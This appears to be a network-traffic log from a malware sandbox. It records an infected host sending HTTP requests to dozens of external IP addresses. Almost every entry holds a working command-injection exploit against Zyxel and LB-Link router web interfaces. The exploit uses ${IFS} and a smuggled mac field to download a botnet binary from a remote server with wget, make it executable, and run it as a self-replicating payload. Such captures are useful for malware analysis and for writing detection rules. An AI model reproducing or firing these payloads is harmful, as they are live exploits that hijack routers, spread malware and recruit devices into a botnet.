                                      Jan 19, 2024 17:29:42.987579107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7031192.168.2.1437142202.47.54.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987623930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7032192.168.2.145358276.130.205.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987656116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7033192.168.2.145134479.35.133.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987694025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7034192.168.2.1444812217.58.93.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987728119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7035192.168.2.146099289.61.183.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987756014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7036192.168.2.144352693.190.148.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987821102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7037192.168.2.1438534155.165.115.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987860918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7038192.168.2.1439860178.105.188.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987904072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7039192.168.2.1453412197.57.12.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987941980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7040192.168.2.145902479.110.27.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.987987041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7041192.168.2.144228475.210.46.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988007069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7042192.168.2.1460780102.72.230.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988066912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7043192.168.2.1455914166.166.142.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988102913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7044192.168.2.1441346150.55.113.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988126040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7045192.168.2.1456046204.76.213.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988182068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7046192.168.2.1442560201.65.198.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988212109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7047192.168.2.1451058195.241.106.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988256931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7048192.168.2.1442494204.27.209.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988317013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7049192.168.2.145027053.247.180.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988343954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7050192.168.2.1454626220.203.26.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988392115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7051192.168.2.1445136218.219.70.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988435030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7052192.168.2.1458860200.102.240.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988456964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7053192.168.2.145714027.224.38.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988495111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7054192.168.2.1441384106.221.80.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988522053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7055192.168.2.144977840.204.199.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988543034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7056192.168.2.1453746181.60.38.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988571882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7057192.168.2.1438456137.57.205.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988632917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7058192.168.2.144665098.189.147.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988667011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7059192.168.2.1448744138.94.160.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988724947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7060192.168.2.1454558111.45.248.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988743067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7061192.168.2.145784467.188.78.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.988810062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7062192.168.2.145400620.20.27.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.989200115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7063192.168.2.144830864.190.202.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.990847111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7064192.168.2.144750292.29.109.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.990951061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7065192.168.2.1451570209.140.200.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992573977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7066192.168.2.1443488142.4.182.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992615938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7067192.168.2.1437732198.186.195.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992683887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7068192.168.2.143347873.224.150.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992710114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7069192.168.2.143425441.236.253.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992738962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7070192.168.2.1449336155.176.123.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992772102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7071192.168.2.1444236211.90.175.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992805958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7072192.168.2.1436658220.135.83.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992834091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7073192.168.2.1444388167.21.117.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992891073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7074192.168.2.145587496.74.195.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992914915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7075192.168.2.143671438.30.229.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992978096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7076192.168.2.145356651.179.236.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.992996931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7077192.168.2.1452834166.83.248.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.993045092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7078192.168.2.1442172145.93.153.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.993088961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7079192.168.2.1446422113.107.230.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.993118048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7080192.168.2.1460142195.243.199.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.993166924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7081192.168.2.1435604149.163.103.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:42.993189096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7082192.168.2.143600631.136.254.2238080
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:43.216221094 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:43.868377924 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:45.180361032 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:47.968270063 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;
                                      Jan 19, 2024 17:29:53.339914083 CET219OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                      Cookie: user=admin
                                      Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                      Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7083192.168.2.1434356188.125.216.1848080
                                      TimestampBytes transferredDirectionData
